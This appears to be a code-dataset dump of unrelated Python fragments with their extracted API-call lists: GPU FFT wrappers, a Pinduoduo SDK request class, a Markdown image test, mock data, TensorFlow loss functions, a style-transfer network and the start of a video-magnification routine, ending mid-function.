axes: tuple[int, int] = (-2, -1),
inplace: bool = False,
fast_math: bool = True,
) -> Array:
return ifftn(input_arr, output_arr, axes, inplace, fast_math)
def fftn(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: tuple[int, ...] | None = None,
inplace: bool = False,
fast_math: bool = True,
) -> Array:
return _fftn(input_arr, output_arr, axes, inplace, fast_math)
def ifftn(
input_arr,
output_arr=None,
axes=None,
inplace=False,
fast_math=True,
):
return _fftn(input_arr, output_arr, axes, inplace, fast_math, _inverse=True)
def rfft(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: int = -1,
inplace: bool = False,
fast_math: bool = True,
) -> Array:
x = _fftn(input_arr, output_arr, (axes,), inplace, fast_math)
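    # keep only the non-redundant half of the spectrum; note that this slicing
    # assumes a 2-D input transformed along its last axis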
return x[:, : input_arr.shape[-1] // 2 + 1]
# FIXME
# def irfft(
# input_arr: np.ndarray | Array,
# output_arr: np.ndarray | Array = None,
# axes: int = -1,
# inplace: bool = False,
# fast_math: bool = True,
# ) -> Array:
# x = _fftn(input_arr, output_arr, axes, inplace, fast_math, _inverse=True)
# shp = list(input_arr.shape)
# n = shp[axes]
# shp[axes] = 2 * n - 2
# result = empty(shp, np.float32)
# result[..., :n] = x.real
# result[..., n - 1 :] = x.real[..., 1:][::-1]
# return result.astype(np.float64)
def rfft2(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: tuple[int, int] = (-2, -1),
inplace: bool = False,
fast_math: bool = True,
) -> Array:
x = _fftn(input_arr, output_arr, axes, inplace, fast_math)
return x[:, : input_arr.shape[1] // 2 + 1]
# FIXME
# def irfft2(
# input_arr: np.ndarray | Array,
# output_arr: np.ndarray | Array = None,
# axes: Tuple[int, int] = (-2, -1),
# inplace: bool = False,
# fast_math: bool = True,
# ) -> Array:
# x = _fftn(input_arr, output_arr, axes, inplace, fast_math)
# return x[:, : input_arr.shape[1] // 2 + 1]
def rfftn(
input_arr: np.ndarray | Array,
output_arr: np.ndarray | Array = None,
axes: tuple[int, ...] | None = None,
inplace: bool = False,
fast_math: bool = True,
) -> Array:
x = _fftn(input_arr, output_arr, axes, inplace, fast_math)
return x[:, : input_arr.shape[1] // 2 + 1]
# FIXME
# def irfftn(
# input_arr: np.ndarray | Array,
# output_arr: np.ndarray | Array = None,
# axes: tuple[int, ...] | None = None,
# inplace: bool = False,
# fast_math: bool = True,
# ) -> Array:
# x = _fftn(input_arr, output_arr, axes, inplace, fast_math)
# return x[..., : input_arr.shape[1] // 2 + 1]
|
[
"pyopencl.array.empty_like",
"gpyfft.fft.FFT",
"numpy.iscomplexobj",
"warnings.filterwarnings",
"numpy.isscalar",
"pyopencl.CommandQueue",
"pyopencl.array.to_device"
] |
[((244, 287), 'warnings.filterwarnings', 'filterwarnings', (['"""ignore"""'], {'module': '"""pyopencl"""'}), "('ignore', module='pyopencl')\n", (258, 287), False, 'from warnings import filterwarnings\n'), ((485, 509), 'pyopencl.CommandQueue', 'cl.CommandQueue', (['context'], {}), '(context)\n', (500, 509), True, 'import pyopencl as cl\n'), ((701, 718), 'numpy.isscalar', 'np.isscalar', (['axes'], {}), '(axes)\n', (712, 718), True, 'import numpy as np\n'), ((1187, 1243), 'gpyfft.fft.FFT', 'FFT', (['context', 'queue', 'arr'], {'axes': 'axes', 'fast_math': 'fast_math'}), '(context, queue, arr, axes=axes, fast_math=fast_math)\n', (1190, 1243), False, 'from gpyfft.fft import FFT\n'), ((3281, 3307), 'numpy.iscomplexobj', 'np.iscomplexobj', (['input_arr'], {}), '(input_arr)\n', (3296, 3307), True, 'import numpy as np\n'), ((3398, 3429), 'pyopencl.array.to_device', 'cla.to_device', (['queue', 'input_arr'], {}), '(queue, input_arr)\n', (3411, 3429), True, 'import pyopencl.array as cla\n'), ((3657, 3685), 'pyopencl.array.empty_like', 'cla.empty_like', (['_input_array'], {}), '(_input_array)\n', (3671, 3685), True, 'import pyopencl.array as cla\n')]
|
# -*- coding: utf-8 -*-
"""
DdkRpPromUrlGenerate.py:
https://open.pinduoduo.com/application/document/api?id=pdd.ddk.rp.prom.url.generate
Generate a promotion URL for marketing tools
"""
from pdd_sdk.api.base import RestApi
class DdkRpPromUrlGenerate(RestApi):
def __init__(self, domain='gw-api.pinduoduo.com', port=80):
RestApi.__init__(self, domain, port)
        self.amount = None  # initial amount in cents; valid values: 300, 500, 700, 1100 and 1600; default 300
        # -1 - activity list, 0 - default red packet, 2 - new-user red packet, 3 - scratch card, 5 - employee internal purchase,
        # 6 - shopping cart, 7 - big-promotion venue, 8 - live-room list collection page, 10 - generate binding/filing link,
        # 11 - generate super red packet (WeChat mini-program only), 12 - smash the golden egg
        self.channel_type = None
        self.custom_parameters = None  # custom parameter used to tag the link; at most 64 bytes
        self.diy_lottery_param = None  # custom parameters for the prize wheel
        self.range_items = None  # custom price and commission ranges
        self.diy_red_packet_param = None  # custom parameters for the red packet
        self.generate_qq_app = None  # whether to generate a QQ mini-program link
        self.generate_schema_url = None  # whether to return a schema URL
        self.generate_short_url = None  # whether to generate a short link: true - yes, false - no
        self.generate_we_app = None  # whether to generate a mini-program promotion link
        self.p_id_list = None  # list of promotion position ids, e.g. ["60005_612"]
def getapiname(self):
return 'pdd.ddk.rp.prom.url.generate'
|
[
"pdd_sdk.api.base.RestApi.__init__"
] |
[((302, 338), 'pdd_sdk.api.base.RestApi.__init__', 'RestApi.__init__', (['self', 'domain', 'port'], {}), '(self, domain, port)\n', (318, 338), False, 'from pdd_sdk.api.base import RestApi\n')]
|
"""Test module of the images."""
import unittest
from books import Books
import fnmatch
import os
import re
import sys
class TestImages(unittest.TestCase):
"""Unit test of the images."""
def test_images_are_valid(self):
"""Test that the MD files refer to valid URLs."""
books = Books()
for book in books.books:
for md_path in book.md_paths:
args = {} if sys.version_info[0] < 3 else {'encoding': 'utf-8'}
with open(md_path, **args) as f:
content = f.read()
for match in re.finditer(r"!\[(.*?)\]\((.*?)\)", content):
# remove parameters
is_youtube_video = match.group(1) == "youtube video"
image_ref = match.group(2).split(' ')[0]
if not is_youtube_video and not image_ref.startswith('http'):
image_path = os.path.join(book.path, image_ref)
self.assertTrue(
os.path.isfile(image_path),
msg='%s: "%s" not found' % (md_path, image_path)
)
def test_all_images_are_used(self):
"""Test that all the image files are referenced somewhere."""
books = Books()
for book in books.books:
# search for all images
images_paths = [] # ['image/sonar.png', 'image/sphere.png', ...]
for root, dirnames, filenames in os.walk(book.path):
if 'scenes' in root.replace(books.project_path, ''):
continue
for filename in fnmatch.filter(filenames, '*.png') + fnmatch.filter(filenames, '*.jpg'):
image_path = os.path.join(root, filename)
image_path = image_path[(len(book.path) + 1):]
images_paths.append(image_path.replace('\\', '/'))
self.assertGreater(
len(images_paths), 0,
msg='No image found in book "%s"' % book.name
)
# check the image reference can be found in at least one MD file
for image_path in images_paths:
found = False
for md_path in book.md_paths:
args = {} if sys.version_info[0] < 3 else {'encoding': 'utf-8'}
with open(md_path, **args) as file:
if (image_path in file.read() or
image_path.replace('.png', '.thumbnail.jpg') in images_paths or
image_path.replace('.png', '.thumbnail.png') in images_paths):
found = True
break
self.assertTrue(
found, msg='Image "%s" not referenced in any MD file.' % image_path
)
# in case of thumbnail make sure the original file is available
if image_path.endswith('.thumbnail.jpg'):
self.assertTrue(
image_path.replace('.thumbnail.jpg', '.png') in images_paths,
msg='Missing original file for thumbnail "%s".' % image_path
)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"fnmatch.filter",
"re.finditer",
"os.walk",
"os.path.isfile",
"books.Books",
"os.path.join"
] |
[((3257, 3272), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3270, 3272), False, 'import unittest\n'), ((306, 313), 'books.Books', 'Books', ([], {}), '()\n', (311, 313), False, 'from books import Books\n'), ((1287, 1294), 'books.Books', 'Books', ([], {}), '()\n', (1292, 1294), False, 'from books import Books\n'), ((1487, 1505), 'os.walk', 'os.walk', (['book.path'], {}), '(book.path)\n', (1494, 1505), False, 'import os\n'), ((586, 633), 're.finditer', 're.finditer', (['"""!\\\\[(.*?)\\\\]\\\\((.*?)\\\\)"""', 'content'], {}), "('!\\\\[(.*?)\\\\]\\\\((.*?)\\\\)', content)\n", (597, 633), False, 'import re\n'), ((1637, 1671), 'fnmatch.filter', 'fnmatch.filter', (['filenames', '"""*.png"""'], {}), "(filenames, '*.png')\n", (1651, 1671), False, 'import fnmatch\n'), ((1674, 1708), 'fnmatch.filter', 'fnmatch.filter', (['filenames', '"""*.jpg"""'], {}), "(filenames, '*.jpg')\n", (1688, 1708), False, 'import fnmatch\n'), ((1743, 1771), 'os.path.join', 'os.path.join', (['root', 'filename'], {}), '(root, filename)\n', (1755, 1771), False, 'import os\n'), ((925, 959), 'os.path.join', 'os.path.join', (['book.path', 'image_ref'], {}), '(book.path, image_ref)\n', (937, 959), False, 'import os\n'), ((1029, 1055), 'os.path.isfile', 'os.path.isfile', (['image_path'], {}), '(image_path)\n', (1043, 1055), False, 'import os\n')]
|
#!/usr/bin/env python3
"""
mock.py - Separate mock util functions
"""
from random import randint
def generate_issue_id():
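    # issue ids are random 5- or 6-digit integers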
return randint(10000, 999999)
users = {
'<EMAIL>': {'email': '<EMAIL>', 'password': '<PASSWORD>', 'type': 'trainstaff'},
'<EMAIL>': {'email': '<EMAIL>', 'password': '<PASSWORD>', 'type': 'trainstaff'},
'<EMAIL>': {'email': '<EMAIL>', 'password': '<PASSWORD>', 'type': 'stationstaff'},
'<EMAIL>': {'email': '<EMAIL>', 'password': '<PASSWORD>', 'type': 'stationstaff'}
}
dialogs = {
"hi": "Hello!",
"how are you?": "Fine and you",
"fine": "Then have a good trip"
}
queries = {
'node1': [
{
"issue_id": 12345,
"resolved": 0,
"title": "why so noisy?",
"created_by": "user_socket_id1",
"priority": 1,
"nearest_station": "station1",
"nearest_staff_id": "<EMAIL>",
"category": "question",
"extra_data": {}
},
{
"issue_id": 12346,
"resolved": 0,
"title": "lost child",
"created_by": "user_socket_id2",
"priority": 5,
"nearest_station": "station1",
"nearest_staff_id": "<EMAIL>",
"category": "lost",
"extra_data": {}
}
]
}
|
[
"random.randint"
] |
[((136, 158), 'random.randint', 'randint', (['(10000)', '(999999)'], {}), '(10000, 999999)\n', (143, 158), False, 'from random import randint\n')]
|
# coding=utf-8
# Copyright 2019 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""losses.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.compat.v1 as tf
from tensorflow.contrib import metrics as contrib_metrics
def margin_loss(labels, raw_logits, margin=0.4, downweight=0.5):
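  # Capsule-style margin loss: after shifting the logits by 0.5, penalize
  # target classes whose logit falls below +margin and (down-weighted)
  # non-target classes whose logit rises above -margin.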
print('margin loss')
logits = raw_logits - 0.5
positive_cost = labels * tf.cast(tf.less(logits, margin),
tf.float32) * tf.pow(logits - margin, 2)
negative_cost = (1 - labels) * tf.cast(
tf.greater(logits, -margin), tf.float32) * tf.pow(logits + margin, 2)
return 0.5 * positive_cost + downweight * 0.5 * negative_cost
def order_loss(labels, logits, margin=0.2):
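  # Penalize any non-target logit that rises to within `margin` of the
  # summed target-class activation.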
label_act = tf.reduce_sum(labels * logits, axis=-1, keep_dims=True)
negative_cost = (1 - labels) * tf.cast(
tf.greater(logits, label_act - margin), tf.float32) * tf.pow(
logits + margin - label_act, 2)
return negative_cost
def optimizer(logits, labels, multi, scope, softmax, rate=1.0, step=0.0):
"""Calculate loss and metrics."""
with tf.name_scope('loss'):
if softmax:
diff = tf.nn.softmax_cross_entropy_with_logits(
labels=labels, logits=logits)
else:
margin = 0.2 + .79 * tf.sigmoid(tf.minimum(10.0, step / 50000.0 - 4))
print('why softmax is on?!')
diff = order_loss(labels=labels, logits=logits, margin=margin)
print('what changed then?!')
# diff = margin_loss(labels=labels, raw_logits=logits)
with tf.name_scope('total'):
cross_entropy = tf.reduce_mean(diff)
tf.add_to_collection('losses', rate * cross_entropy)
tf.summary.scalar('batch_cross_entropy', cross_entropy)
# cross entropy plus all of the regularizers.
losses = tf.add_n(tf.get_collection('losses', scope), name='total_loss')
tf.summary.scalar('total_loss', losses)
with tf.name_scope('accuracy'):
with tf.name_scope('correct_prediction'):
_, classes = tf.nn.top_k(labels, k=2 if multi else 1)
_, preds = tf.nn.top_k(logits, k=2 if multi else 1)
wrong = contrib_metrics.set_size(
contrib_metrics.set_difference(classes, preds))
correct_prediction = tf.equal(wrong, 0)
almost_correct = tf.less(wrong, 2)
correct_prediction_sum = tf.reduce_sum(
tf.cast(correct_prediction, tf.float32))
almost_correct_sum = tf.reduce_sum(tf.cast(almost_correct, tf.float32))
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', accuracy)
tf.summary.scalar('correct_prediction_batch', correct_prediction_sum)
tf.summary.scalar('almost_correct_batch', almost_correct_sum)
return losses, correct_prediction_sum, almost_correct_sum
|
[
"tensorflow.compat.v1.cast",
"tensorflow.compat.v1.equal",
"tensorflow.compat.v1.name_scope",
"tensorflow.compat.v1.reduce_mean",
"tensorflow.compat.v1.nn.top_k",
"tensorflow.compat.v1.minimum",
"tensorflow.compat.v1.pow",
"tensorflow.compat.v1.add_to_collection",
"tensorflow.compat.v1.get_collection",
"tensorflow.compat.v1.nn.softmax_cross_entropy_with_logits",
"tensorflow.compat.v1.less",
"tensorflow.compat.v1.reduce_sum",
"tensorflow.compat.v1.greater",
"tensorflow.contrib.metrics.set_difference",
"tensorflow.compat.v1.summary.scalar"
] |
[((1321, 1376), 'tensorflow.compat.v1.reduce_sum', 'tf.reduce_sum', (['(labels * logits)'], {'axis': '(-1)', 'keep_dims': '(True)'}), '(labels * logits, axis=-1, keep_dims=True)\n', (1334, 1376), True, 'import tensorflow.compat.v1 as tf\n'), ((2229, 2284), 'tensorflow.compat.v1.summary.scalar', 'tf.summary.scalar', (['"""batch_cross_entropy"""', 'cross_entropy'], {}), "('batch_cross_entropy', cross_entropy)\n", (2246, 2284), True, 'import tensorflow.compat.v1 as tf\n'), ((2411, 2450), 'tensorflow.compat.v1.summary.scalar', 'tf.summary.scalar', (['"""total_loss"""', 'losses'], {}), "('total_loss', losses)\n", (2428, 2450), True, 'import tensorflow.compat.v1 as tf\n'), ((3121, 3160), 'tensorflow.compat.v1.summary.scalar', 'tf.summary.scalar', (['"""accuracy"""', 'accuracy'], {}), "('accuracy', accuracy)\n", (3138, 3160), True, 'import tensorflow.compat.v1 as tf\n'), ((3163, 3232), 'tensorflow.compat.v1.summary.scalar', 'tf.summary.scalar', (['"""correct_prediction_batch"""', 'correct_prediction_sum'], {}), "('correct_prediction_batch', correct_prediction_sum)\n", (3180, 3232), True, 'import tensorflow.compat.v1 as tf\n'), ((3235, 3296), 'tensorflow.compat.v1.summary.scalar', 'tf.summary.scalar', (['"""almost_correct_batch"""', 'almost_correct_sum'], {}), "('almost_correct_batch', almost_correct_sum)\n", (3252, 3296), True, 'import tensorflow.compat.v1 as tf\n'), ((1052, 1078), 'tensorflow.compat.v1.pow', 'tf.pow', (['(logits - margin)', '(2)'], {}), '(logits - margin, 2)\n', (1058, 1078), True, 'import tensorflow.compat.v1 as tf\n'), ((1170, 1196), 'tensorflow.compat.v1.pow', 'tf.pow', (['(logits + margin)', '(2)'], {}), '(logits + margin, 2)\n', (1176, 1196), True, 'import tensorflow.compat.v1 as tf\n'), ((1479, 1517), 'tensorflow.compat.v1.pow', 'tf.pow', (['(logits + margin - label_act)', '(2)'], {}), '(logits + margin - label_act, 2)\n', (1485, 1517), True, 'import tensorflow.compat.v1 as tf\n'), ((1671, 1692), 'tensorflow.compat.v1.name_scope', 'tf.name_scope', (['"""loss"""'], {}), "('loss')\n", (1684, 1692), True, 'import tensorflow.compat.v1 as tf\n'), ((2354, 2388), 'tensorflow.compat.v1.get_collection', 'tf.get_collection', (['"""losses"""', 'scope'], {}), "('losses', scope)\n", (2371, 2388), True, 'import tensorflow.compat.v1 as tf\n'), ((2459, 2484), 'tensorflow.compat.v1.name_scope', 'tf.name_scope', (['"""accuracy"""'], {}), "('accuracy')\n", (2472, 2484), True, 'import tensorflow.compat.v1 as tf\n'), ((1723, 1792), 'tensorflow.compat.v1.nn.softmax_cross_entropy_with_logits', 'tf.nn.softmax_cross_entropy_with_logits', ([], {'labels': 'labels', 'logits': 'logits'}), '(labels=labels, logits=logits)\n', (1762, 1792), True, 'import tensorflow.compat.v1 as tf\n'), ((2101, 2123), 'tensorflow.compat.v1.name_scope', 'tf.name_scope', (['"""total"""'], {}), "('total')\n", (2114, 2123), True, 'import tensorflow.compat.v1 as tf\n'), ((2147, 2167), 'tensorflow.compat.v1.reduce_mean', 'tf.reduce_mean', (['diff'], {}), '(diff)\n', (2161, 2167), True, 'import tensorflow.compat.v1 as tf\n'), ((2174, 2226), 'tensorflow.compat.v1.add_to_collection', 'tf.add_to_collection', (['"""losses"""', '(rate * cross_entropy)'], {}), "('losses', rate * cross_entropy)\n", (2194, 2226), True, 'import tensorflow.compat.v1 as tf\n'), ((2495, 2530), 'tensorflow.compat.v1.name_scope', 'tf.name_scope', (['"""correct_prediction"""'], {}), "('correct_prediction')\n", (2508, 2530), True, 'import tensorflow.compat.v1 as tf\n'), ((2551, 2591), 'tensorflow.compat.v1.nn.top_k', 'tf.nn.top_k', (['labels'], {'k': '(2 if multi else 1)'}), '(labels, k=2 if multi else 1)\n', (2562, 2591), True, 'import tensorflow.compat.v1 as tf\n'), ((2609, 2649), 'tensorflow.compat.v1.nn.top_k', 'tf.nn.top_k', (['logits'], {'k': '(2 if multi else 1)'}), '(logits, k=2 if multi else 1)\n', (2620, 2649), True, 'import tensorflow.compat.v1 as tf\n'), ((2775, 2793), 'tensorflow.compat.v1.equal', 'tf.equal', (['wrong', '(0)'], {}), '(wrong, 0)\n', (2783, 2793), True, 'import tensorflow.compat.v1 as tf\n'), ((2817, 2834), 'tensorflow.compat.v1.less', 'tf.less', (['wrong', '(2)'], {}), '(wrong, 2)\n', (2824, 2834), True, 'import tensorflow.compat.v1 as tf\n'), ((3019, 3044), 'tensorflow.compat.v1.name_scope', 'tf.name_scope', (['"""accuracy"""'], {}), "('accuracy')\n", (3032, 3044), True, 'import tensorflow.compat.v1 as tf\n'), ((978, 1001), 'tensorflow.compat.v1.less', 'tf.less', (['logits', 'margin'], {}), '(logits, margin)\n', (985, 1001), True, 'import tensorflow.compat.v1 as tf\n'), ((1127, 1154), 'tensorflow.compat.v1.greater', 'tf.greater', (['logits', '(-margin)'], {}), '(logits, -margin)\n', (1137, 1154), True, 'import tensorflow.compat.v1 as tf\n'), ((1425, 1463), 'tensorflow.compat.v1.greater', 'tf.greater', (['logits', '(label_act - margin)'], {}), '(logits, label_act - margin)\n', (1435, 1463), True, 'import tensorflow.compat.v1 as tf\n'), ((2700, 2746), 'tensorflow.contrib.metrics.set_difference', 'contrib_metrics.set_difference', (['classes', 'preds'], {}), '(classes, preds)\n', (2730, 2746), True, 'from tensorflow.contrib import metrics as contrib_metrics\n'), ((2891, 2930), 'tensorflow.compat.v1.cast', 'tf.cast', (['correct_prediction', 'tf.float32'], {}), '(correct_prediction, tf.float32)\n', (2898, 2930), True, 'import tensorflow.compat.v1 as tf\n'), ((2973, 3008), 'tensorflow.compat.v1.cast', 'tf.cast', (['almost_correct', 'tf.float32'], {}), '(almost_correct, tf.float32)\n', (2980, 3008), True, 'import tensorflow.compat.v1 as tf\n'), ((3078, 3117), 'tensorflow.compat.v1.cast', 'tf.cast', (['correct_prediction', 'tf.float32'], {}), '(correct_prediction, tf.float32)\n', (3085, 3117), True, 'import tensorflow.compat.v1 as tf\n'), ((1852, 1888), 'tensorflow.compat.v1.minimum', 'tf.minimum', (['(10.0)', '(step / 50000.0 - 4)'], {}), '(10.0, step / 50000.0 - 4)\n', (1862, 1888), True, 'import tensorflow.compat.v1 as tf\n')]
|
import enum
from InternalNode import InternalNode
from LeafNode import LeafNode
from NodeTag import NodeTag
class TreeHash:
class HashKeyDefinitions(enum.Enum):
PerTGroup = 0
hashKeyDefinition = HashKeyDefinitions.PerTGroup
@staticmethod
def hash(tree):
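        # Compact the tree when its root carries a T tag. Note: compactF and
        # compactTree are referenced below but are not defined in this captured
        # snippet; they presumably come from elsewhere in the original module.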
if TreeHash.hashKeyDefinition == TreeHash.HashKeyDefinitions.PerTGroup:
if NodeTag.isT(tree.root.nodeTag):
left = compactF(tree.root.leftNode())
right = compactF(tree.root.rightNode())
compactTree.root = InternalNode(left, right, compactTree)
|
[
"InternalNode.InternalNode",
"NodeTag.NodeTag.isT"
] |
[((382, 412), 'NodeTag.NodeTag.isT', 'NodeTag.isT', (['tree.root.nodeTag'], {}), '(tree.root.nodeTag)\n', (393, 412), False, 'from NodeTag import NodeTag\n'), ((559, 597), 'InternalNode.InternalNode', 'InternalNode', (['left', 'right', 'compactTree'], {}), '(left, right, compactTree)\n', (571, 597), False, 'from InternalNode import InternalNode\n')]
|
# Copyright 2017 Google Inc. All Rights Reserved.
# Modifications copyright 2018 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Style transfer network code.
This model does not apply styles in the encoding
layers. Encoding layers (contract) use batch norm as the normalization function.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import lib.model as model_util
import tensorflow.contrib.slim as slim
def transform(input_, normalizer_fn=None, normalizer_params=None,
reuse=False, trainable=True, is_training=True):
"""Maps content images to stylized images.
Args:
input_: Tensor. Batch of input images.
normalizer_fn: normalization layer function for applying style
normalization.
normalizer_params: dict of parameters to pass to the style normalization op.
reuse: bool. Whether to reuse model parameters. Defaults to False.
trainable: bool. Should the parameters be marked as trainable?
    is_training: bool. Whether the network is in the training phase.
Returns:
Tensor. The output of the transformer network.
"""
with tf.variable_scope('transformer', reuse=reuse):
with slim.arg_scope(
[slim.conv2d],
activation_fn=tf.nn.relu,
normalizer_fn=normalizer_fn,
normalizer_params=normalizer_params,
weights_initializer=tf.random_normal_initializer(0.0, 0.01),
biases_initializer=tf.constant_initializer(0.0),
trainable=trainable):
with slim.arg_scope([slim.conv2d], normalizer_fn=slim.batch_norm,
normalizer_params=None,
trainable=trainable):
with slim.arg_scope([slim.batch_norm], is_training=is_training,
trainable=trainable):
with tf.variable_scope('contract'):
h = model_util.conv2d(input_, 9, 1, 32, 'conv1')
h = model_util.conv2d(h, 3, 2, 64, 'conv2')
h = model_util.conv2d(h, 3, 2, 128, 'conv3')
with tf.variable_scope('residual'):
h = model_util.residual_block(h, 3, 'residual1')
h = model_util.residual_block(h, 3, 'residual2')
h = model_util.residual_block(h, 3, 'residual3')
h = model_util.residual_block(h, 3, 'residual4')
h = model_util.residual_block(h, 3, 'residual5')
with tf.variable_scope('expand'):
h = model_util.upsampling(h, 3, 2, 64, 'conv1')
h = model_util.upsampling(h, 3, 2, 32, 'conv2')
return model_util.upsampling(
h, 9, 1, 3, 'conv3', activation_fn=tf.nn.sigmoid)
def style_normalization_activations(pre_name='transformer',
post_name='StyleNorm'):
"""Returns scope name and depths of the style normalization activations.
Args:
pre_name: string. Prepends this name to the scope names.
post_name: string. Appends this name to the scope names.
Returns:
string. Scope names of the activations of the transformer network which are
used to apply style normalization.
int[]. Depths of the activations of the transformer network which are used
to apply style normalization.
"""
scope_names = ['residual/residual1/conv1',
'residual/residual1/conv2',
'residual/residual2/conv1',
'residual/residual2/conv2',
'residual/residual3/conv1',
'residual/residual3/conv2',
'residual/residual4/conv1',
'residual/residual4/conv2',
'residual/residual5/conv1',
'residual/residual5/conv2',
'expand/conv1/conv',
'expand/conv2/conv',
'expand/conv3/conv']
scope_names = ['{}/{}/{}'.format(pre_name, name, post_name)
for name in scope_names]
depths = [128, 128, 128, 128, 128, 128, 128, 128, 128, 128, 64, 32, 3]
return scope_names, depths
|
[
"tensorflow.contrib.slim.arg_scope",
"lib.model.residual_block",
"tensorflow.constant_initializer",
"tensorflow.variable_scope",
"lib.model.conv2d",
"tensorflow.random_normal_initializer",
"lib.model.upsampling"
] |
[((1697, 1742), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""transformer"""'], {'reuse': 'reuse'}), "('transformer', reuse=reuse)\n", (1714, 1742), True, 'import tensorflow as tf\n'), ((2117, 2226), 'tensorflow.contrib.slim.arg_scope', 'slim.arg_scope', (['[slim.conv2d]'], {'normalizer_fn': 'slim.batch_norm', 'normalizer_params': 'None', 'trainable': 'trainable'}), '([slim.conv2d], normalizer_fn=slim.batch_norm,\n normalizer_params=None, trainable=trainable)\n', (2131, 2226), True, 'import tensorflow.contrib.slim as slim\n'), ((2709, 2738), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""residual"""'], {}), "('residual')\n", (2726, 2738), True, 'import tensorflow as tf\n'), ((2760, 2804), 'lib.model.residual_block', 'model_util.residual_block', (['h', '(3)', '"""residual1"""'], {}), "(h, 3, 'residual1')\n", (2785, 2804), True, 'import lib.model as model_util\n'), ((2825, 2869), 'lib.model.residual_block', 'model_util.residual_block', (['h', '(3)', '"""residual2"""'], {}), "(h, 3, 'residual2')\n", (2850, 2869), True, 'import lib.model as model_util\n'), ((2890, 2934), 'lib.model.residual_block', 'model_util.residual_block', (['h', '(3)', '"""residual3"""'], {}), "(h, 3, 'residual3')\n", (2915, 2934), True, 'import lib.model as model_util\n'), ((2955, 2999), 'lib.model.residual_block', 'model_util.residual_block', (['h', '(3)', '"""residual4"""'], {}), "(h, 3, 'residual4')\n", (2980, 2999), True, 'import lib.model as model_util\n'), ((3020, 3064), 'lib.model.residual_block', 'model_util.residual_block', (['h', '(3)', '"""residual5"""'], {}), "(h, 3, 'residual5')\n", (3045, 3064), True, 'import lib.model as model_util\n'), ((3082, 3109), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""expand"""'], {}), "('expand')\n", (3099, 3109), True, 'import tensorflow as tf\n'), ((3131, 3174), 'lib.model.upsampling', 'model_util.upsampling', (['h', '(3)', '(2)', '(64)', '"""conv1"""'], {}), "(h, 3, 2, 64, 'conv1')\n", (3152, 3174), True, 'import lib.model as model_util\n'), ((3195, 3238), 'lib.model.upsampling', 'model_util.upsampling', (['h', '(3)', '(2)', '(32)', '"""conv2"""'], {}), "(h, 3, 2, 32, 'conv2')\n", (3216, 3238), True, 'import lib.model as model_util\n'), ((3262, 3333), 'lib.model.upsampling', 'model_util.upsampling', (['h', '(9)', '(1)', '(3)', '"""conv3"""'], {'activation_fn': 'tf.nn.sigmoid'}), "(h, 9, 1, 3, 'conv3', activation_fn=tf.nn.sigmoid)\n", (3283, 3333), True, 'import lib.model as model_util\n'), ((1960, 1999), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', (['(0.0)', '(0.01)'], {}), '(0.0, 0.01)\n', (1988, 1999), True, 'import tensorflow as tf\n'), ((2032, 2060), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['(0.0)'], {}), '(0.0)\n', (2055, 2060), True, 'import tensorflow as tf\n'), ((2309, 2388), 'tensorflow.contrib.slim.arg_scope', 'slim.arg_scope', (['[slim.batch_norm]'], {'is_training': 'is_training', 'trainable': 'trainable'}), '([slim.batch_norm], is_training=is_training, trainable=trainable)\n', (2323, 2388), True, 'import tensorflow.contrib.slim as slim\n'), ((2451, 2480), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""contract"""'], {}), "('contract')\n", (2468, 2480), True, 'import tensorflow as tf\n'), ((2510, 2554), 'lib.model.conv2d', 'model_util.conv2d', (['input_', '(9)', '(1)', '(32)', '"""conv1"""'], {}), "(input_, 9, 1, 32, 'conv1')\n", (2527, 2554), True, 'import lib.model as model_util\n'), ((2583, 2622), 'lib.model.conv2d', 'model_util.conv2d', (['h', '(3)', '(2)', '(64)', '"""conv2"""'], {}), "(h, 3, 2, 64, 'conv2')\n", (2600, 2622), True, 'import lib.model as model_util\n'), ((2651, 2691), 'lib.model.conv2d', 'model_util.conv2d', (['h', '(3)', '(2)', '(128)', '"""conv3"""'], {}), "(h, 3, 2, 128, 'conv3')\n", (2668, 2691), True, 'import lib.model as model_util\n')]
|
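For context, here is a minimal usage sketch of the transformer module above. The input shape and the choice of slim.batch_norm as the style normalizer are assumptions, not part of the captured source:
# Hypothetical driver (TF1 graph mode, as implied by the contrib imports).
inputs = tf.placeholder(tf.float32, shape=[1, 256, 256, 3])
stylized = transform(inputs,
                     normalizer_fn=slim.batch_norm,
                     normalizer_params={'is_training': False},
                     is_training=False)
scope_names, depths = style_normalization_activations()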
import cv2
import numpy as np
import scipy.fftpack
import scipy.signal
from matplotlib import pyplot
# from eulerian_magnification.io import play_vid_data
from eulerian_magnification.pyramid import create_laplacian_video_pyramid, collapse_laplacian_video_pyramid
from eulerian_magnification.transforms import temporal_bandpass_filter
def eulerian_magnification(vid_data, fps, freq_min, freq_max, amplification, pyramid_levels=4, skip_levels_at_top=2):
vid_pyramid = create_laplacian_video_pyramid(vid_data, pyramid_levels=pyramid_levels)
for i, vid in enumerate(vid_pyramid):
if i < skip_levels_at_top or i >= len(vid_pyramid) - 1:
